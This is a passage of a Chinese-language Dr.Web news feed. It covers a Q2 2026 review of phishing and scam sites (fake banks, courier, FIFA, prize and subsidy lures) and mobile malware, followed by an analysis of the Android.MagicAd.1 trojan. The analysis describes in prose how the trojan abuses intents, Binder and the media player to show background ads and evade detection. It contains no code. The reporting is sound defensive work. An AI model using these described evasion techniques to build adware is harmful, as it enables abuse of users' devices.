&lt;p class="text-center"&gt;&lt;em&gt;诈骗网站邀请用户注册一个据称与某俄罗斯银行有关的投资项目，并获得基于ChatGPT的专门金融聊天机器人访问权限&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;同时，诈骗者不仅利用俄罗斯银行的名义，还利用外国信贷机构的名义来吸引俄语用户。例如，一些伪投资服务网站被网络犯罪分子包装成与韩国银行有关。&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.cn/static/new-www/news/2026/july/review_common_q2/06_fake_korean_invest_q2_2026.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.cn/static/new-www/news/2026/july/review_common_q2/06_fake_korean_invest_q2_2026.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;一个诈骗网站，向俄语用户提议参与某韩国银行的投资项目，承诺收益2,000,000韩元起&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;第二季度，试图窃取各种服务账户数据的诈骗活动依然活跃。例如，在众多钓鱼网站中，出现了假冒运输公司的网站，针对某俄罗斯快递服务的客户。潜在受害者被要求通过绑定账户的手机号码登录，或通过俄罗斯公共服务门户网站授权。值得注意的是，即使通过第一种方式"登录"账户后，该网站仍会以门户网站授权为幌子，显示第二个钓鱼登录页面。&lt;/p&gt;

&lt;div class="img img-two-v same-height"&gt;
    &lt;a href="https://st.drweb.cn/static/new-www/news/2026/july/review_common_q2/07_fake_transport_q2_2026.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.cn/static/new-www/news/2026/july/review_common_q2/07_fake_transport_q2_2026.1.png"&gt;
    &lt;/a&gt;
    &lt;a href="https://st.drweb.cn/static/new-www/news/2026/july/review_common_q2/08_fake_gos_q2_2026.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.cn/static/new-www/news/2026/july/review_common_q2/08_fake_gos_q2_2026.1.png"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;利用这个诈骗网站，诈骗者能够同时窃取多个账户的数据，包括快递公司网站的个人账户和公共服务门户网站的账户&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;我们的专家还发现了针对多国信贷机构的新钓鱼网站。例如，诈骗者向某美国银行的储户提议登录其账户，查看是否为"忠实客户"提供了更高的利率：&lt;/p&gt;

&lt;div class="img img-two-v same-height"&gt;
    &lt;a href="https://st.drweb.cn/static/new-www/news/2026/july/review_common_q2/09_fake_usa_bank_q2_2026.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.cn/static/new-www/news/2026/july/review_common_q2/09_fake_usa_bank_q2_2026.1.png"&gt;
    &lt;/a&gt;
    &lt;a href="https://st.drweb.cn/static/new-www/news/2026/july/review_common_q2/10_fake_usa_banklogin_q2_2026.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.cn/static/new-www/news/2026/july/review_common_q2/10_fake_usa_banklogin_q2_2026.1.png"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;在另一个案例中，一个钓鱼网站模仿的是厄瓜多尔某银行的外观，要求用户输入其网上银行的用户名和密码：&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.cn/static/new-www/news/2026/july/review_common_q2/11_fake_ecuador_bank_q2_2026.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.cn/static/new-www/news/2026/july/review_common_q2/11_fake_ecuador_bank_q2_2026.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;另一起钓鱼诈骗针对的是英国用户。网络犯罪分子创建假冒的政府服务网站，要求用户缴纳违章停车罚款。&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.cn/static/new-www/news/2026/july/review_common_q2/12_fake_uk_parking1_q2_2026.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.cn/static/new-www/news/2026/july/review_common_q2/12_fake_uk_parking1_q2_2026.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;潜在受害者被要求提供详细的个人信息用于所谓身份验证，之后会被重定向到"罚款"支付页面。&lt;/p&gt;

&lt;div class="img img-two-v same-height"&gt;
    &lt;a href="https://st.drweb.cn/static/new-www/news/2026/july/review_common_q2/13_fake_uk_parking2_q2_2026.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.cn/static/new-www/news/2026/july/review_common_q2/13_fake_uk_parking2_q2_2026.1.png"&gt;
    &lt;/a&gt;
    &lt;a href="https://st.drweb.cn/static/new-www/news/2026/july/review_common_q2/14_fake_uk_parking3_q2_2026.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.cn/static/new-www/news/2026/july/review_common_q2/14_fake_uk_parking3_q2_2026.1.png"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;另一种常见的诈骗手段仍是向民众承诺各种无偿补助金。然而，网络犯罪分子会根据时事不断调整内容。例如，在庆祝俄罗斯日前夕，出现了假冒俄罗斯信贷机构的网站，承诺节日补贴。其中一个网站谎称用户完成调查问卷后可获得5,000至300,000卢布不等的金额：&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.cn/static/new-www/news/2026/july/review_common_q2/15_fake_russia_pay_q2_2026.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.cn/static/new-www/news/2026/july/review_common_q2/15_fake_russia_pay_q2_2026.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;在该诈骗手法的另一个变种是承诺用户在完成问卷后可获得5,000卢布的"资助"：&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.cn/static/new-www/news/2026/july/review_common_q2/16_fake_russia_help_q2_2026.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.cn/static/new-www/news/2026/july/review_common_q2/16_fake_russia_help_q2_2026.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;而在一系列关于俄罗斯某些地区燃料短缺的投机性传闻背景下，一些诈骗网站承诺提供油票，可免费领取20至100升的汽油：&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.cn/static/new-www/news/2026/july/review_common_q2/17_fake_russia_fuel_q2_2026.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.cn/static/new-www/news/2026/july/review_common_q2/17_fake_russia_fuel_q2_2026.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;这些网站的访问者在回答了几个简单问题后，被要求进行"身份验证"，也就是提供姓名、手机号码以及银行卡号。随后，诈骗者便可能利用这些信息来盗取受害者的钱财。&lt;/p&gt;

&lt;div class="img img-two-v same-height"&gt;
    &lt;a href="https://st.drweb.cn/static/new-www/news/2026/july/review_common_q2/18_fake_russia_payoutcard_q2_2026.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.cn/static/new-www/news/2026/july/review_common_q2/18_fake_russia_payoutcard_q2_2026.1.png"&gt;
    &lt;/a&gt;
    &lt;a href="https://st.drweb.cn/static/new-www/news/2026/july/review_common_q2/19_fake_russia_payoutdata_q2_2026.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.cn/static/new-www/news/2026/july/review_common_q2/19_fake_russia_payoutdata_q2_2026.1.png"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;在第二季度侦测到的不良网站中，还出现了假冒国际足联（FIFA）官方门户的网站，欺骗用户在这些网站上可从官方渠道购买2026年世界杯足球赛门票、官方纪念品品以及各种高级服务。与真实网站一样，这些假冒网站的访问者被要求登录FIFA ID账户，但假冒的登录页面会接受输入的任何数据。&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.cn/static/new-www/news/2026/july/review_common_q2/20_fake_fifaid_q2_2026.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.cn/static/new-www/news/2026/july/review_common_q2/20_fake_fifaid_q2_2026.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;假冒的FIFA ID账户登录页面&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;当足球爱好者选择了他们感兴趣的商品后，就会被要求下单并付款。同时，在付款过程中，用户会进入某服务的网站，而该网站已被列入Dr.Web反病毒软件不推荐的互联网资源数据库。&lt;/p&gt;

&lt;div class="img img-two-v same-height"&gt;
    &lt;a href="https://st.drweb.cn/static/new-www/news/2026/july/review_common_q2/21_fake_fifa_purchase_q2_2026.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.cn/static/new-www/news/2026/july/review_common_q2/21_fake_fifa_purchase_q2_2026.1.png"&gt;
    &lt;/a&gt;
    &lt;a href="https://st.drweb.cn/static/new-www/news/2026/july/review_common_q2/22_fake_fifa_pay_q_2026.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.cn/static/new-www/news/2026/july/review_common_q2/22_fake_fifa_pay_q_2026.1.png"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;假冒的国际足联网站，谎称可购买官方授权的产品和服务 &lt;/em&gt;&lt;/p&gt;

&lt;p&gt;我们的专家还记录到一系列垃圾邮件活动，目的是传播定向到俄罗斯电商假冒平台的链接，诈骗者在此类网站上邀请潜在受害者参与所谓"周年庆抽奖活动"，承诺有机会获得高达1,000,000卢布的现金奖励，以及电脑和移动设备：&lt;/p&gt;

&lt;div class="img img-two-v same-height"&gt;
    &lt;a href="https://st.drweb.cn/static/new-www/news/2026/july/review_common_q2/23_fake_marketplace_prize1_q2_2026.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.cn/static/new-www/news/2026/july/review_common_q2/23_fake_marketplace_prize1_q2_2026.1.png"&gt;
    &lt;/a&gt;
    &lt;a href="https://st.drweb.cn/static/new-www/news/2026/july/review_common_q2/24_fake_marketplace_prize2_q2_2026.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.cn/static/new-www/news/2026/july/review_common_q2/24_fake_marketplace_prize2_q2_2026.1.png"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;参与"活动"的用户需要点击此类网站上的相应按钮，随后网站会模拟抽奖过程。在经过几次尝试后，潜在受害者会被告知赢得了数份礼物，并可自行选择：一是在电商平台自提点领取实物奖品，二是将奖品折现并转账至银行账户：&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.cn/static/new-www/news/2026/july/review_common_q2/25_fake_marketplace_prize3_q2_2026.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.cn/static/new-www/news/2026/july/review_common_q2/25_fake_marketplace_prize3_q2_2026.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;当选择在自提点领取奖品时，网站会显示所需商品已库存告罄，但用户仍然可以将其兑换成现金。随后，页面会模拟与客服人员的聊天，以"确认"兑换奖品的意向。而此时潜在受害者就需要提供银行卡号：&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.cn/static/new-www/news/2026/july/review_common_q2/26_fake_marketplace_prize4_q2_2026.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.cn/static/new-www/news/2026/july/review_common_q2/26_fake_marketplace_prize4_q2_2026.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt; 在输入卡号后，网站会要求支付手续费，用于"正式办理中奖手续":&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.cn/static/new-www/news/2026/july/review_common_q2/27_fake_marketplace_prize5_q2_2026.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.cn/static/new-www/news/2026/july/review_common_q2/27_fake_marketplace_prize5_q2_2026.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;实际上，诈骗受害者什么奖品也得不到。他们不仅向诈骗者透露了自己的银行卡信息，还白白搭进了自己的钱。&lt;/p&gt;

&lt;div class="notrecommend"&gt;
    &lt;a href="https://antifraud.drweb.cn/dangerous_urls/"&gt;了解Dr.Web不建议访问网站更多详情&lt;/a&gt;
&lt;/div&gt;

&lt;h3&gt;移动设备恶意软件和不良软件&lt;/h3&gt;

&lt;p&gt;根据Dr.Web Security Space移动设备保护产品的侦测统计数据，2026年第二季度，用户遭遇 &lt;a href="https://vms.drweb.cn/search/?q=Android.Banker&amp;lng=cn"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt; 银行木马的频率有所下降，但这些木马应用仍然是侦测数量最多的恶意软件。同时，&lt;a href="https://vms.drweb.cn/search/?q=Android.HiddenAds&amp;lng=cn"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt; 和 &lt;a href="https://vms.drweb.cn/search/?q=Android.MobiDash&amp;lng=cn"&gt;&lt;b&gt;Android.MobiDash&lt;/b&gt;&lt;/a&gt; 广告木马的活跃度再次出现下降。&lt;/p&gt;

&lt;p&gt;第二季度侦测最频繁的风险程序是经NP Manager修改工具处理过的 &lt;a href="https://vms.drweb.cn/search/?q=Tool.Obfuscator.TrashCode&amp;lng=cn"&gt;&lt;b&gt;Tool.Obfuscator.TrashCode&lt;/b&gt;&lt;/a&gt; 和 &lt;a href="https://vms.drweb.cn/search/?q=Tool.NPMod&amp;lng=cn"&gt;&lt;b&gt;Tool.NPMod&lt;/b&gt;&lt;/a&gt; 应用。病毒编写者使用这个工具来帮助恶意软件逃避反病毒软件的侦测。最常见的不良程序是假冒的反病毒软件 &lt;a href="https://vms.drweb.cn/search/?q=Program.FakeAntiVirus&amp;lng=cn"&gt;&lt;b&gt;Program.FakeAntiVirus&lt;/b&gt;&lt;/a&gt;，会要求用户购买完整版，谎称能"清除"其找到的威胁。&lt;/p&gt;

&lt;p&gt;最活跃的广告软件模块是 &lt;a href="https://vms.drweb.cn/search/?q=Adware.AdPush&amp;lng=cn"&gt;&lt;b&gt;Adware.AdPush&lt;/b&gt;&lt;/a&gt;，会显示误导性通知并收集敏感数据。所谓安卓操作系统运行的优化应用 &lt;a href="https://vms.drweb.cn/search/?q=Adware.Bastion&amp;lng=cn"&gt;&lt;b&gt;Adware.Bastion&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt; 再次开始传播，会推送内存不足或系统出错的通知，以便在所谓的"优化"过程中展示广告。广告程序 &lt;b&gt;Adware.Opensite.15&lt;/b&gt; 也保持较高的活跃度，网络犯罪分子将其伪装成作弊程序，声称可让用户获取各种游戏的道具资源。实际上这些程序只会加载带有广告的网站。&lt;/p&gt;

&lt;p&gt;6月，Dr.Web公司专家&lt;a href="https://news.drweb.cn/show/?i=15262" target="_blank"&gt;提醒&lt;/a&gt;注意被命名为 &lt;a href="https://vms.drweb.cn/search/?q=Android.MagicAd.1&amp;lng=cn"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt; 的木马，该木马能够绕过安卓操作系统限制，以后台模式展示广告。&lt;a href="https://vms.drweb.cn/search/?q=Android.MagicAd.1&amp;lng=cn"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt; 能够通过利用第三方应用程序，还会根据目标设备制造商选择的不同技术手段来绕过限制。&lt;/p&gt;

&lt;p&gt;第二季度我们的病毒分析师在Google Play目录中再次发现了多个来自 &lt;a href="https://vms.drweb.cn/search/?q=Android.Joker&amp;lng=cn"&gt;&lt;b&gt;Android.Joker&lt;/b&gt;&lt;/a&gt; 和 &lt;a href="https://vms.drweb.cn/search/?q=Android.Subscription&amp;lng=cn"&gt;&lt;b&gt;Android.Subscription&lt;/b&gt;&lt;/a&gt; 家族的木马程序，功能是诱骗用户订阅付费服务。这些应用的总下载量不少于260万次。&lt;/p&gt;

&lt;p&gt;第二季度主要移动安全事件：&lt;/p&gt;

&lt;ul class="list"&gt;
    &lt;li&gt;&lt;a href="https://vms.drweb.cn/search/?q=Android.Banker&amp;lng=cn"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt; 银行木马在受Dr.Web保护的设备的侦测数量仍为最多&lt;/li&gt;
    &lt;li&gt;网络犯罪分子更加频繁使用安卓应用修改工具来增强银行木马逃避反病毒软件侦测的能力&lt;/li&gt;
    &lt;li&gt;广告木马 &lt;a href="https://vms.drweb.cn/search/?q=Android.MobiDash&amp;lng=cn"&gt;&lt;b&gt;Android.MobiDash&lt;/b&gt;&lt;/a&gt; 和 &lt;a href="https://vms.drweb.cn/search/?q=Android.HiddenAds&amp;lng=cn"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt; 的活动再度下降&lt;/li&gt;
    &lt;li&gt;Dr.Web病毒分析师发现 &lt;a href="https://vms.drweb.cn/search/?q=Android.MagicAd.1&amp;lng=cn"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt; 木马，该木马利用第三方程序绕过Android系统限制，在后台展示广告&lt;/li&gt;
    &lt;li&gt;Google Play目录出现新的木马应用，诱骗用户订阅付费服务&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;2026年第二季度份移动威胁更多详情请参阅&lt;a href="https://news.drweb.cn/show/review/?lng=cn&amp;i=15274" target="_blank"&gt;移动威胁综述&lt;/a&gt;。&lt;/p&gt;</description></item><item><guid>https://news.drweb.cn/show/?i=15262&amp;lng=cn</guid><title>Android.MagicAd 木马无视所有限制强行显示广告</title><link>https://news.drweb.cn/show/?i=15262&amp;lng=cn&amp;c=5</link><pubDate>Thu, 25 Jun 2026 02:00:00 GMT</pubDate><description>&lt;p&gt;&lt;newslead&gt;Doctor Web公司反病毒实验室专家发现了一种木马程序，命名为 Android.MagicAd 。这种新木马能以多种方式绕过 安卓操作系统的限制，后台运行显示广告。其中一种方法为通用，其他方法则针对特定厂商的设备。这些方法包括利用第三方应用程序以及使用系统媒体播放器。&lt;/newslead&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://vms.drweb.cn/search/?q=Android.MagicAd.1&amp;lng=cn"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt; 通过小米设备官方应用商店 GetApps传播，隐藏在超过50款不同的游戏和程序中。这些应用在商店中出现的时间很短，通常不超过一个月，随后便会消失，并被新的应用取代。攻击者可能试图以此方式让 &lt;a href="https://vms.drweb.cn/search/?q=Android.MagicAd.1&amp;lng=cn"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt; 不易被过早发现，同时又保持其活跃性：从商店下架后，木马程序仍会留在用户设备上，并可能继续执行恶意活动。目前，我们侦测到的所有包含 &lt;a href="https://vms.drweb.cn/search/?q=Android.MagicAd.1&amp;lng=cn"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt; 的应用均已无法从 GetApps 目录下载，而传播这些木马的开发者也已不再发布内置该木马的新程序。&lt;/p&gt;

&lt;p&gt;我公司病毒分析师进行的研究表明，&lt;a href="https://vms.drweb.cn/search/?q=Android.MagicAd.1&amp;lng=cn"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt; 的最初版本出现于2025年，并且除了 GetApps 目录外，也曾出现在三星的 Galaxy Store 。&lt;/p&gt;

&lt;div class="img img-two"&gt;
    &lt;a href="https://st.drweb.cn/static/new-www/news/2026/may/android_magic_ad/01_Android.MagicAd_store_1.png" data-fancybox=""&gt;
        &lt;img src="https://st.drweb.cn/static/new-www/news/2026/may/android_magic_ad/01_Android.MagicAd_store_1.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
    &lt;a href="https://st.drweb.cn/static/new-www/news/2026/may/android_magic_ad/02_Android.MagicAd_store_2.png" data-fancybox=""&gt;
        &lt;img src="https://st.drweb.cn/static/new-www/news/2026/may/android_magic_ad/02_Android.MagicAd_store_2.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;i&gt;GetApps 目录隐藏 Android.MagicAd.1 的游戏和程序示例。本新闻发布时，这些木马变种及其他版本均已无法下载&lt;/i&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://vms.drweb.cn/search/?q=Android.MagicAd.1&amp;lng=cn"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt; 的部分恶意功能位于 dex 模块，这些模块隐藏在木马文件资源目录下加密的本地库，运行过程中会解密库，从中提取自身组件后启动。&lt;/p&gt;

&lt;p&gt;在开始显示广告之前，木马会执行一系列检查，以确保其运行环境安全。例如，木马会寻找在虚拟环境中运行的迹象，检查其安装是否是由用户主动进行，被感染设备的 IP 地址是否在其黑名单中等等。&lt;/p&gt;

&lt;p&gt;如果 &lt;a href="https://vms.drweb.cn/search/?q=Android.MagicAd.1&amp;lng=cn"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt; 未发现可疑活动，就会隐藏自己在主屏幕程序列表中的图标。然后会创建一个通知渠道，通过该渠道启动多个恶意常驻服务，以便在恶意应用窗口关闭后在后台运行。接下来&lt;a href="https://vms.drweb.cn/search/?q=Android.MagicAd.1&amp;lng=cn"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt; 会通过任务调度程序创建一个任务，定期重启那些检查通知渠道运行状态并在必要时重新启动通知渠道的服务。此外，在安卓操作系统版本相对陈旧的设备，木马会启动一个虚拟屏幕，以防止其组件运行被系统中断。&lt;/p&gt;

&lt;p&gt;为了达到在窗口关闭后以后台模式显示广告的目的，&lt;a href="https://vms.drweb.cn/search/?q=Android.MagicAd.1&amp;lng=cn"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt; 会采用一系列针对受感染设备具体厂商的方法。应用这些方法的无需明确请求系统权限&lt;span class="string"&gt;SYSTEM_ALERT_WINDOW&lt;/span&gt;，也就是覆盖其他程序显示的权限。&lt;/p&gt;

&lt;p&gt;无论采用哪种方法，所有广告横幅都以半透明活动（Translucent Activity）形式加载，让木马能够将其显示在现有窗口之上。&lt;/p&gt;

&lt;div class="img img-two-v same-height"&gt;
    &lt;a href="https://st.drweb.cn/static/new-www/news/2026/may/android_magic_ad/03_Android.MagicAd_banner1.png" data-fancybox=""&gt;
        &lt;img src="https://st.drweb.cn/static/new-www/news/2026/may/android_magic_ad/03_Android.MagicAd_banner1.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
    &lt;a href="https://st.drweb.cn/static/new-www/news/2026/may/android_magic_ad/04_Android.MagicAd_banner2.png" data-fancybox=""&gt;
        &lt;img src="https://st.drweb.cn/static/new-www/news/2026/may/android_magic_ad/04_Android.MagicAd_banner2.1.png" alt="#drweb"&gt;
    &lt;/a&gt;

    &lt;a href="https://st.drweb.cn/static/new-www/news/2026/may/android_magic_ad/05_Android.MagicAd_banner3.png" data-fancybox=""&gt;
        &lt;img src="https://st.drweb.cn/static/new-www/news/2026/may/android_magic_ad/05_Android.MagicAd_banner3.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
    &lt;a href="https://st.drweb.cn/static/new-www/news/2026/may/android_magic_ad/06_Android.MagicAd_banner4.png" data-fancybox=""&gt;
        &lt;img src="https://st.drweb.cn/static/new-www/news/2026/may/android_magic_ad/06_Android.MagicAd_banner4.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p class="text-center"&gt;&lt;i&gt;&lt;a href="https://vms.drweb.cn/search/?q=Android.MagicAd.1&amp;lng=cn"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt;所显示广告的示例&lt;/i&gt;&lt;/p&gt;

&lt;p&gt;还又一种方法通过向其他应用程序发送意图（Intent）来实现。这种方法让木马能够绕过安卓操作系统较新版本禁止程序自行启动的限制。取决于受感染设备的型号，&lt;a href="https://vms.drweb.cn/search/?q=Android.MagicAd.1&amp;lng=cn"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt;通过此技术自行显示广告，或者直接"迫使"目标应用程序显示广告横幅。&lt;/p&gt;

&lt;p&gt;使用这种方法的一个木马变种的目标应用是：&lt;/p&gt;
&lt;ul class="list"&gt;
    &lt;li&gt;
        小米设备上的 Mi Browser 浏览器；
    &lt;/li&gt;
    &lt;li&gt;
        小米设备上的 Miui SystemUI 图形界面；
    &lt;/li&gt;
    &lt;li&gt;
        亚马逊 TV 设备上的 Amazon Fire TV Home Screen 启动器。
    &lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;这些都是相应设备上的系统应用程序，因此即使未被用户直接启动，也能处理意图。只要这些程序处于活动状态并能接收意图，&lt;a href="https://vms.drweb.cn/search/?q=Android.MagicAd.1&amp;lng=cn"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt; 就可以利用其显示广告。&lt;/p&gt;

&lt;p&gt;而且如果小米设备的 Mi Browser不是系统应用，木马也同样可以利用这个浏览器来显示广告，直到浏览器窗口被关闭。&lt;/p&gt;

&lt;p&gt;&lt;a href="https://vms.drweb.cn/search/?q=Android.MagicAd.1&amp;lng=cn"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt; 在相应设备发现 Mi Browser 后就会向自己的 dex 组件（Dr.Web将其侦测为 &lt;a href="https://vms.drweb.cn/search/?q=Android.MagicAd.1.origin&amp;lng=cn"&gt;&lt;b&gt;Android.MagicAd.1.origin&lt;/b&gt;&lt;/a&gt;）发送一个延迟意图来启动广告。该组件会根据这个延迟意图生成自己的意图并传递给浏览器，浏览器再从中提取原始意图，并据此启动广告。&lt;/p&gt;

&lt;p&gt;与另外两个程序的交互方式则略有不同，是被用来从后台模式唤醒木马。首先，&lt;a href="https://vms.drweb.cn/search/?q=Android.MagicAd.1&amp;lng=cn"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt; 向 &lt;a href="https://vms.drweb.cn/search/?q=Android.MagicAd.1.origin&amp;lng=cn"&gt;&lt;b&gt;Android.MagicAd.1.origin&lt;/b&gt;&lt;/a&gt; 模块发送一个用于启动广告的延迟意图，该模块再向目标程序传递一个用于唤醒自身的意图。如果目标是 Miui SystemUI，会响应并发送自己的意图来启动该模块。如果目标是 Amazon Fire TV Home Screen，会直接按数据包名称启动该模块。获得控制权后，&lt;a href="https://vms.drweb.cn/search/?q=Android.MagicAd.origin&amp;lng=cn"&gt;&lt;b&gt;Android.MagicAd.origin&lt;/b&gt;&lt;/a&gt; 模块就会显示从主恶意应用延迟意图中收到的广告。&lt;/p&gt;

&lt;p&gt;如果无法通过这种方式显示广告，木马会再尝试两次，如果仍然失败，则会尝试直接显示广告，不再使用延迟意图和其恶意 dex 模块。&lt;/p&gt;

&lt;p&gt;这种方法的另一个变种与上一个类似，利用的是 Vivo 设备上的程序。不同之处在于，广告的启动是通过 Android Binder完成（一个负责进程间通信的系统组件）。在这种情况下，木马的目标是以下系统程序：&lt;/p&gt;
&lt;ul class="list"&gt;
    &lt;li&gt;
        iManager
    &lt;/li&gt;
    &lt;li&gt;
        电话簿
    &lt;/li&gt;
    &lt;li&gt;
        Vivo 浏览器
    &lt;/li&gt;
    &lt;li&gt;
        百度输入法
    &lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;a href="https://vms.drweb.cn/search/?q=Android.MagicAd.1&amp;lng=cn"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt; 通过 Android Binder来启动这些应用，通过 Parcel 数据容器发送普通意图。然后这些程序就会启动木马组件 &lt;a href="https://vms.drweb.cn/search/?q=Android.MagicAd.origin&amp;lng=cn"&gt;&lt;b&gt;Android.MagicAd.origin&lt;/b&gt;&lt;/a&gt;，而组件以后台模式激活后便会显示广告。&lt;/p&gt;

&lt;p&gt;&lt;a href="https://vms.drweb.cn/search/?q=Android.MagicAd.1&amp;lng=cn"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt; 还设计了其他几种在后台运行时显示广告的方法，其中包括使用媒体播放器。与针对特定设备的方法不同，为通用方法，适用于来自不同制造商的绝大多数型号。&lt;a href="https://vms.drweb.cn/search/?q=Android.MagicAd.1&amp;lng=cn"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt; 会从自身程序中解密出一个音频文件，并将其保存到工作目录。然后，恶意程序启动一个系统媒体播放器实例，在其中设置最小音量，并将其与安卓操作系统的全局多媒体管理系统关联。接着， &lt;a href="https://vms.drweb.cn/search/?q=Android.MagicAd.1&amp;lng=cn"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt; 会设置一个广播接收器，监听其按下操作。然后，木马通过一条特殊的 adb 命令模拟用户操作，按下播放器中的录音按钮，之后会立即关闭其窗口。按下按钮会触发系统媒体接收器，使得 &lt;a href="https://vms.drweb.cn/search/?q=Android.MagicAd.1&amp;lng=cn"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt; 能够截获控制权并启动广告。&lt;/p&gt;

&lt;p&gt;Dr.Web Security Space移动设备版能够可靠侦测并删除所有恶意程序 &lt;a href="https://vms.drweb.cn/search/?q=Android.MagicAd.1&amp;lng=cn"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt;已知版本，因此该木马不会对我们的用户构成威胁。&lt;/p&gt;

&lt;p&gt;&lt;a href="https://github.com/DoctorWebLtd/malware-iocs/blob/master/Android.MagicAd.1/README.adoc" target="_blank" rel="noopener"&gt;失陷指标&lt;/a&gt;&lt;/p&gt;
